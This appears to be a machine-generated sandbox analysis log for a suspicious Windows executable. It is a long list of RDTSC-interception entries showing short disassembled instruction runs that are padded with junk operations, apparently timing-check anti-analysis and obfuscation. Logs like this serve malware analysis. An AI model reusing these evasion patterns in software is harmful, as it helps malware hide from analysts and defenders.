Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149EE5 second address: 1149EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149EEB second address: 1149F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9093D6549h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114E5CE second address: 114E5EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE908EE711Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114E5EF second address: 114E5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114E5F3 second address: 114E606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114EE86 second address: 114EE8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114EE8C second address: 114EEA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jng 00007FE908EE7108h 0x00000011 pushad 0x00000012 popad 0x00000013 jl 00007FE908EE710Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114EFB6 second address: F80AE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jno 00007FE9093D6537h 0x0000000f push dword ptr [ebp+12A307E9h] 0x00000015 clc 0x00000016 call dword ptr [ebp+12A31BC9h] 0x0000001c pushad 0x0000001d or dword ptr [ebp+12A31BB4h], eax 0x00000023 xor eax, eax 0x00000025 mov dword ptr [ebp+12A31BB4h], esi 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f jc 00007FE9093D654Eh 0x00000035 jmp 00007FE9093D6548h 0x0000003a mov dword ptr [ebp+12A33867h], eax 0x00000040 mov dword ptr [ebp+12A3193Dh], ebx 0x00000046 jmp 00007FE9093D6540h 0x0000004b mov esi, 0000003Ch 0x00000050 jg 00007FE9093D6537h 0x00000056 stc 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jnc 00007FE9093D654Ch 0x00000061 lodsw 0x00000063 clc 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007FE9093D6549h 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 cld 0x00000072 nop 0x00000073 push edi 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1154859 second address: 115485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115521B second address: 115521F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1155495 second address: 11554C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7119h 0x00000007 jmp 00007FE908EE7116h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11554C8 second address: 11554CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11558B8 second address: 11558D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007FE908EE7106h 0x00000012 js 00007FE908EE7106h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E9E93 second address: 10E9E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112739C second address: 11273A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11273A3 second address: 110FBE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FE9093D6536h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sbb cx, 19F1h 0x00000014 call dword ptr [ebp+12A31B0Fh] 0x0000001a jmp 00007FE9093D653Eh 0x0000001f pushad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11274D4 second address: 11274D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11279B7 second address: 11279BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11283C0 second address: 11283C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11283C4 second address: 11283EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9093D6541h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11283EA second address: 1128410 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE908EE7108h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnl 00007FE908EE7110h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1128410 second address: 1128445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9093D6548h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE9093D6545h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1110684 second address: 1110699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C607 second address: 115C618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C618 second address: 115C61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C61E second address: 115C622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C622 second address: 115C626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C8D4 second address: 115C8DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C8DC second address: 115C8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE908EE7106h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C8E9 second address: 115C930 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9093D653Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FE9093D6542h 0x00000016 jmp 00007FE9093D6547h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e jno 00007FE9093D653Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C930 second address: 115C936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C936 second address: 115C947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9093D653Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115C947 second address: 115C94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 115CC27 second address: 115CC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D6546h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11615A9 second address: 11615B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE710Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11615B9 second address: 11615D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9093D6536h 0x00000008 jmp 00007FE9093D6540h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11615D9 second address: 11615DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161A7D second address: 1161A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007FE9093D6546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161BF3 second address: 1161BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161BF7 second address: 1161BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161BFB second address: 1161C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161C01 second address: 1161C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FE9093D6536h 0x0000000e jmp 00007FE9093D653Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161C1D second address: 1161C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161F4A second address: 1161F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161F4E second address: 1161F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1161F56 second address: 1161F7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FE9093D6536h 0x00000009 jmp 00007FE9093D653Ch 0x0000000e pop edi 0x0000000f ja 00007FE9093D6547h 0x00000015 jmp 00007FE9093D653Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116210F second address: 116211D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE908EE7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116225B second address: 1162261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1168358 second address: 1168374 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE908EE7113h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11685F8 second address: 11685FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11685FD second address: 1168635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7113h 0x00000007 js 00007FE908EE7116h 0x0000000d jmp 00007FE908EE7110h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 jl 00007FE908EE710Eh 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11687A7 second address: 11687AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11687AB second address: 11687EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007FE908EE7106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FE908EE7118h 0x00000012 jmp 00007FE908EE7112h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 jmp 00007FE908EE7115h 0x0000001e ja 00007FE908EE710Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1168982 second address: 1168999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6543h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1168D97 second address: 1168D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1169048 second address: 1169054 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007FE9093D6536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116918E second address: 11691B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FE908EE7116h 0x0000000b jnl 00007FE908EE7106h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1169302 second address: 1169308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1169308 second address: 116931B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007FE908EE7106h 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116E7A7 second address: 116E7AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116E7AB second address: 116E7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 116FE6E second address: 116FE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741017B second address: 741017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741017F second address: 741019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b pushad 0x0000000c mov ebx, 0D752A00h 0x00000011 movsx edi, ax 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, 1330h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741019D second address: 74101A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101A3 second address: 74101F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE9093D6549h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FE9093D653Eh 0x00000017 mov esi, dword ptr [76EB06ECh] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101F5 second address: 74101F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101F9 second address: 74101FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74101FF second address: 7410205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410205 second address: 741025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007FE9093D6540h 0x00000012 jne 00007FE9093D73B9h 0x00000018 jmp 00007FE9093D6540h 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE9093D6547h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741025B second address: 7410318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ebx, 2D471AE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov ax, 7B79h 0x00000014 mov eax, 385B5635h 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c mov si, 16EDh 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FE908EE7118h 0x00000027 and si, 11B8h 0x0000002c jmp 00007FE908EE710Bh 0x00000031 popfd 0x00000032 popad 0x00000033 popad 0x00000034 call dword ptr [76E80B60h] 0x0000003a mov eax, 7617E5E0h 0x0000003f ret 0x00000040 jmp 00007FE908EE7115h 0x00000045 push 00000044h 0x00000047 jmp 00007FE908EE710Eh 0x0000004c pop edi 0x0000004d pushad 0x0000004e movzx ecx, dx 0x00000051 pushfd 0x00000052 jmp 00007FE908EE7113h 0x00000057 and ax, AD8Eh 0x0000005c jmp 00007FE908EE7119h 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 mov edi, 17A10AEEh 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410318 second address: 741034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 call 00007FE9093D653Ch 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov cx, D34Dh 0x00000014 mov di, cx 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a movzx esi, di 0x0000001d movsx ebx, cx 0x00000020 popad 0x00000021 push dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edi 0x00000027 pop ecx 0x00000028 mov ax, di 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74103D2 second address: 74103D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74103D6 second address: 74103F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74103F3 second address: 741040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741040F second address: 7410413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410413 second address: 7410441 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007FE978906393h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FE908EE710Ah 0x00000017 or ecx, 3595E3D8h 0x0000001d jmp 00007FE908EE710Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410441 second address: 7410493 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FE9093D653Bh 0x0000000c pop eax 0x0000000d popad 0x0000000e mov eax, 00000000h 0x00000013 jmp 00007FE9093D6544h 0x00000018 mov dword ptr [esi], edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edi, 6145A980h 0x00000022 call 00007FE9093D6549h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410493 second address: 7410499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410499 second address: 741049D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741049D second address: 74104E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE908EE710Eh 0x00000015 adc esi, 6A1B2D58h 0x0000001b jmp 00007FE908EE710Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov ebx, esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74104E4 second address: 74104E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74104E8 second address: 7410501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+08h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE908EE710Dh 0x00000011 rdtsc
